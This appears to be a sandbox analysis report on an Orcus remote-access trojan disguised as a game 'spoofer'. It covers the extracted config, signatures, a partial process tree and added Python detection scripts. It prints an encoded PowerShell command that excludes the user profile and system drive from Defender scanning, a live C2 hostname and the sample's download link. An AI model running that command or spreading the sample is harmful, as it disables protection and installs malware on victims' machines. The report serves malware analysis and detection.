Analysis
max time kernel: 430s
max time network: 433s
platform: windows11-21h2_x64
resource: win11-20250207-en
resource tags: arch:x64, arch:x86, image:win11-20250207-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 09/02/2025, 17:59
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
  Sample: https://gofile.io/d/dg0UQ7
  Resource: win10ltsc2021-20250128-en
Malware Config
Extracted
Family: orcus
C2: another-contains.gl.at.ply.gg
a49af69032c94d6fa7c0d2639d32f038
administration_rights_required: false
anti_debugger: false
anti_tcp_analyzer: false
antivm: false
autostart_method: 1
change_creation_date: false
force_installer_administrator_privileges: false
hide_file: false
install: false
installation_folder: %appdata%\Microsoft\Speech\AudioDriver.exe
installservice: false
keylogger_enabled: false
newcreationdate: 12/24/2024 02:03:43
plugins: AgUFyOzBvwKV1wLetwKoxrcNilV/bBUKRwBhAG0AZQByACAAVgBpAGUAdwAHAzEALgAyAEEgYgA2ADkAZgA0ADUAZQBiADYANgAxADYANAA2ADAAZgA5AGUAMQAwADIAMgBkADcANwA3ADMAMABmADAANwAzAAIAAAACAg==
reconnect_delay: 10000
registry_autostart_keyname: Audio HD Driver
registry_hidden_autostart: false
set_admin_flag: false
tasksch_name: Audio HD Driver
tasksch_request_highest_privileges: false
try_other_autostart_onfail: false

The config names the persistence artifacts to hunt for: the Run value and the scheduled task are both called "Audio HD Driver", and the payload path %appdata%\Microsoft\Speech\AudioDriver.exe expands to C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe, which is exactly the AudioDriver.exe (PID 4904) that spoof.exe launches in the process tree below.
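The plugins value above is an opaque base64 blob that the report does not decode. The following is an added example, not part of the Triage report and not Orcus code: it carves the printable UTF-16LE runs out of the blob and, as a heuristic of my own (the real serialization format is not documented by the report), checks whether each run is preceded by a one-byte character count, which is what a length-prefixed .NET string looks like. On this blob it recovers three strings, "Gamer View", "1.2" and a 32-hex-digit identifier, which read as a plugin name, version and ID; that reading is an interpretation, not something the report states.

```python
from __future__ import annotations

import base64
import re

# `plugins` value from the extracted Orcus config in this report.
ORCUS_PLUGINS_B64 = (
    "AgUFyOzBvwKV1wLetwKoxrcNilV/bBUKRwBhAG0AZQByACAAVgBpAGUAdwAHAzEALgAyAEEg"
    "YgA2ADkAZgA0ADUAZQBiADYANgAxADYANAA2ADAAZgA5AGUAMQAwADIAMgBkADcANwA3ADMA"
    "MABmADAANwAzAAIAAAACAg=="
)


def carve_utf16le_strings(blob: bytes, min_chars: int = 3) -> list[tuple[int, str, bool]]:
    """Carve runs of printable UTF-16LE text out of an arbitrary byte blob.

    Returns (byte offset, text, length_prefix_ok) per run. length_prefix_ok is a
    heuristic (an assumption, not a documented property of the Orcus format): it is
    True when the byte immediately before the run equals the run's character count,
    which is how a length-prefixed string written by a .NET BinaryWriter looks.
    """
    # printable ASCII low byte followed by a zero high byte, at least min_chars times
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_chars)
    runs = []
    for m in pattern.finditer(blob):
        text = m.group().decode("utf-16-le")
        prefix_ok = m.start() > 0 and blob[m.start() - 1] == len(text)
        runs.append((m.start(), text, prefix_ok))
    return runs


def decode_plugins(b64: str) -> list[tuple[int, str, bool]]:
    """Base64-decode the config value and carve its strings."""
    return carve_utf16le_strings(base64.b64decode(b64))


if __name__ == "__main__":
    blob = base64.b64decode(ORCUS_PLUGINS_B64)
    print(f"{len(blob)} bytes")
    for offset, text, prefix_ok in carve_utf16le_strings(blob):
        tag = "length-prefixed" if prefix_ok else "no length prefix"
        print(f"  +0x{offset:02x}  {text!r}  ({tag})")
```

The carver is generic: point it at any config blob or memory dump to pull out UTF-16LE strings, which ASCII-only `strings` runs miss. The length-prefix check is only a sanity signal; it says the run is probably a whole field rather than a fragment of something larger.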
Signatures
Orcus family

Executes dropped EXE 7 IoCs
  pid   Process
  2896  GHOSTYFN.exe
  5524  GHOSTYFN.exe
  1104  spoof.exe
  4904  AudioDriver.exe
  3860  GHOSTYFN.exe
  6108  GHOSTYFN.exe
  1256  spoof.exe

Loads dropped DLL 15 IoCs
  pid   Process          hits
  5524  GHOSTYFN.exe     7
  4904  AudioDriver.exe  1
  6108  GHOSTYFN.exe     7

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Process                  description  ioc
  MicrosoftEdgeUpdate.exe  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (×3)
  spoof.exe                Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (×2)
  powershell.exe           Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (×2)
  GHOSTYFN.exe             Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (×2)
  wermgr.exe               Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
  AudioDriver.exe          Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
  pid   Process
  2012  MicrosoftEdgeUpdate.exe
  4676  MicrosoftEdgeUpdate.exe
  1956  MicrosoftEdgeUpdate.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
  Process      description        ioc
  taskmgr.exe  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000  (×2)
  taskmgr.exe  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A  (×2)
  taskmgr.exe  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName  (×2)

Checks processor information in registry 2 TTPs 17 IoCs
Processor information is often read in order to detect sandboxing environments.
All 17 hits are under \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (the wermgr.exe "Key opened" hit was logged with the mixed-case path \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0).
  Process      description        ioc (relative to CentralProcessor\0)
  firefox.exe  Key value queried  Update Signature
  firefox.exe  Key value queried  Update Revision
  firefox.exe  Key value queried  ~Mhz  (×2)
  firefox.exe  Key value queried  ProcessorNameString
  firefox.exe  Key value queried  VendorIdentifier
  firefox.exe  Key opened         (the key itself)  (×2)
  wermgr.exe   Key opened         (the key itself)
  wermgr.exe   Key value queried  ProcessorNameString
  wermgr.exe   Key value queried  VendorIdentifier
  wermgr.exe   Key value queried  ~MHz
  wermgr.exe   Key value queried  Identifier
  wermgr.exe   Key value queried  Platform Specific Field 1
  wermgr.exe   Key value queried  Update Revision
  taskmgr.exe  Key value queried  ProcessorNameString
  taskmgr.exe  Key opened         (the key itself)

Enumerates system info in registry 2 TTPs 2 IoCs
  Process     description        ioc
  wermgr.exe  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS
  wermgr.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Modifies registry class 3 IoCs
  Process      description  ioc
  firefox.exe  Key created  \REGISTRY\USER\S-1-5-21-1387034853-841019411-4036473919-1000_Classes\Local Settings
  taskmgr.exe  Key created  \REGISTRY\USER\S-1-5-21-1387034853-841019411-4036473919-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask  (×2)

NTFS ADS 1 IoCs
  Process      description   ioc
  firefox.exe  File created  C:\Users\Admin\Downloads\Ghosty Permanent Spoofer.rar:Zone.Identifier
This Zone.Identifier stream is the Mark of the Web that Firefox attaches to the downloaded archive; the hit records the download itself, not ADS abuse by the sample.
Suspicious behavior: EnumeratesProcesses 64 IoCs
  pid   Process          hits
  4724  powershell.exe   3
  4904  AudioDriver.exe  52
  2028  powershell.exe   3
  8     taskmgr.exe      6

Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  pid   Process
  1612  taskmgr.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs
  Token                       pid   Process
  SeDebugPrivilege            2936  firefox.exe      (×6)
  SeRestorePrivilege          3960  7zG.exe
  35                          3960  7zG.exe
  SeSecurityPrivilege         3960  7zG.exe          (×2)
  SeDebugPrivilege            4724  powershell.exe
  SeDebugPrivilege            4904  AudioDriver.exe
  SeDebugPrivilege            2028  powershell.exe
  SeDebugPrivilege            2936  firefox.exe
  SeDebugPrivilege            8     taskmgr.exe
  SeSystemProfilePrivilege    8     taskmgr.exe
  SeCreateGlobalPrivilege     8     taskmgr.exe
  33                          8     taskmgr.exe
  SeIncBasePriorityPrivilege  8     taskmgr.exe
  SeBackupPrivilege           2400  svchost.exe
  SeRestorePrivilege          2400  svchost.exe
  SeSecurityPrivilege         2400  svchost.exe
  SeTakeOwnershipPrivilege    2400  svchost.exe
  35                          2400  svchost.exe
  SeDebugPrivilege            1612  taskmgr.exe
  SeSystemProfilePrivilege    1612  taskmgr.exe
  SeCreateGlobalPrivilege     1612  taskmgr.exe
  SeDebugPrivilege            2936  firefox.exe
  33                          1612  taskmgr.exe
  SeIncBasePriorityPrivilege  1612  taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs
  pid   Process      hits
  2936  firefox.exe  21
  3960  7zG.exe      1
  8     taskmgr.exe  36
  1612  taskmgr.exe  6

Suspicious use of SendNotifyMessage 64 IoCs
  pid   Process      hits
  8     taskmgr.exe  36
  1612  taskmgr.exe  28

Suspicious use of SetWindowsHookEx 9 IoCs
  pid   Process       hits
  2936  firefox.exe   7
  2896  GHOSTYFN.exe  1
  3860  GHOSTYFN.exe  1

Suspicious use of WriteProcessMemory 64 IoCs
  description                       pid   Process      procid_target  hits
  PID 1992 wrote to memory of 2936  1992  firefox.exe  90             11
  PID 2936 wrote to memory of 3260  2936  firefox.exe  91             45
  PID 2936 wrote to memory of 324   2936  firefox.exe  92             8

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
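The powershell.exe children of GHOSTYFN.exe (PIDs 4724 and 2028 in the process tree below) are started with -EncodedCommand, which carries base64 over UTF-16LE text, and the script inside has junk `<# ... #>` block comments spliced between its tokens; that is the Command Obfuscation hit listed above. The following is an added example, not part of the Triage report and not Orcus code: it decodes the argument, strips the comment filler, flags the result as Defender tampering when it calls Add-MpPreference or Set-MpPreference with an -Exclusion* parameter, and runs that pipeline over a few constructed process-creation records (the real command line from this report, a benign encoded Get-Date, and a non-PowerShell process). The event tuples, the detection rule and the SAMPLE_EVENTS names are my own construction.

```python
from __future__ import annotations

import base64
import re

# -EncodedCommand argument of the powershell.exe children of GHOSTYFN.exe
# (PIDs 4724 and 2028 in the process tree), copied from this report.
ENCODED_FROM_REPORT = (
    "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMA"
    "PgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIA"
    "bwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMA"
    "PgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (plus -ec), so match them all.
_ENC_FLAGS = sorted({"ec"} | {"encodedcommand"[:i] for i in range(1, 15)}, key=len, reverse=True)
ENCODED_FLAG = re.compile(
    r"-(?:" + "|".join(_ENC_FLAGS) + r")\s+\"?([A-Za-z0-9+/]+=*)\"?", re.IGNORECASE
)
JUNK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)  # block comments used as filler between tokens
MP_PREFERENCE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)
EXCLUSION_PARAM = re.compile(
    r"-(Exclusion(?:Path|Process|Extension|IpAddress))\s+(\S+)", re.IGNORECASE
)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries UTF-16LE text; decoding it as UTF-8 gives NUL-riddled garbage."""
    return base64.b64decode(b64).decode("utf-16-le")


def deobfuscate(script: str) -> str:
    """Remove <# ... #> filler comments and collapse the whitespace they leave behind."""
    return " ".join(JUNK_COMMENT.sub(" ", script).split())


def defender_exclusions(script: str) -> list[tuple[str, str]]:
    """(parameter, value) pairs when the script adds Microsoft Defender exclusions, else []."""
    if not MP_PREFERENCE.search(script):
        return []
    return EXCLUSION_PARAM.findall(script)


def scan_process_events(events: list[tuple[int, str, str]]) -> list[dict]:
    """Run decode -> deobfuscate -> flag over (pid, image, command_line) records."""
    findings = []
    for pid, image, cmdline in events:
        if not image.lower().endswith("powershell.exe"):
            continue
        m = ENCODED_FLAG.search(cmdline)
        if not m:
            continue
        try:
            raw = decode_encoded_command(m.group(1))
        except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
            continue
        clean = deobfuscate(raw)
        findings.append({
            "pid": pid,
            "script": clean,
            "obfuscated": JUNK_COMMENT.search(raw) is not None,
            "defender_exclusions": defender_exclusions(clean),
        })
    return findings


# Constructed sample: the real command line from this report plus two benign records.
SAMPLE_EVENTS = [
    (4724, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "' + ENCODED_FROM_REPORT + '"'),
    (1234, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -enc " + base64.b64encode("Get-Date".encode("utf-16-le")).decode()),
    (8, r"C:\Windows\system32\taskmgr.exe", '"C:\\Windows\\system32\\taskmgr.exe" /0'),
]

if __name__ == "__main__":
    for f in scan_process_events(SAMPLE_EVENTS):
        verdict = "DEFENDER EXCLUSION" if f["defender_exclusions"] else "benign"
        print(f'pid {f["pid"]}: {verdict}; obfuscated={f["obfuscated"]}; script={f["script"]!r}')
```

On the report's command line the pipeline yields `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force`, i.e. the sample excludes the whole user profile and the system drive from Defender scanning before dropping its payload. Matching on the decoded text rather than the raw base64 is the point: the base64 changes with every junk-comment variant, the decoded cmdlet and parameter names do not.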
Processes
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://gofile.io/d/dg0UQ7"1⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://gofile.io/d/dg0UQ72⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 27429 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0da864e-42d9-4224-bf9e-59da19ba50fe} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" gpu3⤵PID:3260
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2364 -parentBuildID 20240401114208 -prefsHandle 2356 -prefMapHandle 2352 -prefsLen 28349 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c599c28f-3bf0-40e8-83b1-143a9f4755b7} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" socket3⤵PID:324
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3228 -childID 1 -isForBrowser -prefsHandle 3220 -prefMapHandle 3216 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {21b256c7-feea-4aee-a426-0e215f7aa00a} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab3⤵PID:2092
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3656 -childID 2 -isForBrowser -prefsHandle 3608 -prefMapHandle 3632 -prefsLen 32839 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20a9eeae-b411-4d02-802b-14933f13d112} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab3⤵PID:2384
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4576 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4568 -prefMapHandle 4564 -prefsLen 32839 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {362f46ce-f206-4424-84fb-4d9d13bcfbda} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" utility3⤵
- Checks processor information in registry
PID:5384
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5288 -childID 3 -isForBrowser -prefsHandle 5284 -prefMapHandle 5280 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff1b7953-a996-4143-bd60-3e91bd053b2d} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab3⤵PID:5908
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5424 -childID 4 -isForBrowser -prefsHandle 5432 -prefMapHandle 5436 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {764df39f-0ab4-4cc3-8650-6e5764a1beaf} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab3⤵PID:5920
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5696 -childID 5 -isForBrowser -prefsHandle 5616 -prefMapHandle 5620 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5be6a179-36f8-45ab-8e0c-0045347d91b9} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab3⤵PID:5932
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3588 -childID 6 -isForBrowser -prefsHandle 6048 -prefMapHandle 6056 -prefsLen 30775 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff6b4771-597e-4506-96a0-a3fec45edb9b} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab3⤵PID:5756
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping 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-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczODk1NjY0MSIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNDI5MjY4NjIxMDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUxMzg3MzcwMDMiLz48L2FwcD48L3JlcXVlc3Q-1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2012
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5320,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=3784 /prefetch:141⤵PID:5168
-
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2612" "1264" "1164" "1272" "0" "0" "0" "0" "0" "0" "0" "0"1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID:1612
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDE5Nzg3NTEtNkVERi00OTM4LThENDktNzI1NTRDQzZEODNCfSIgdXNlcmlkPSJ7Qzg3OUI1RTUtMEQ0MC00RDY4LTg4ODktNjc2RkU4MDEzQTg0fSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins0NDUyRjcyMi0zQkU2LTQ1RjItQTA2OS02QjMwOEU2NkYwQUN9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9Ins1NkVCMThGOC1CMDA4LTRDQkQtQjZEMi04Qzk3RkU3RTkwNjJ9IiB2ZXJzaW9uPSIxMzIuMC4yOTU3LjE0MCIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczODk1NjE2MiI-PGV2ZW50IGV2ZW50dHlwZT0iMzIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjQiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUzMTI1Mzc0MTEiLz48L2FwcD48L3JlcXVlc3Q-1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4676
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDE5Nzg3NTEtNkVERi00OTM4LThENDktNzI1NTRDQzZEODNCfSIgdXNlcmlkPSJ7Qzg3OUI1RTUtMEQ0MC00RDY4LTg4ODktNjc2RkU4MDEzQTg0fSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins2MEE4MDdDMS05M0JGLTQ2RkMtODlDMy1GQ0VGOEJFMDAxNDJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMSIgY29ob3J0PSJycmZAMC4wOCI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSIyIiByZD0iNjYxMiIgcGluZ19mcmVzaG5lc3M9Ins2RkJBQTk1RC1FM0UzLTQwRkEtQUVCNS0wRUIwMjZENjY4QTB9Ii8-PC9hcHA-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-PHBpbmcgcj0iMiIgcmQ9IjY2MTIiIHBpbmdfZnJlc2huZXNzPSJ7MkIyOUY3QkItN0QwRS00MzVDLUEyQjAtQTU2NzNEQkQwRjhFfSIvPjwvYXBwPjwvcmVxdWVzdD41⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:1956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5228,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=3724 /prefetch:141⤵PID:244
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1508
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4368,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:141⤵PID:4372
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\" -spe -an -ai#7zMap17337:110:7zEvent220931⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3960
-
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2896 -
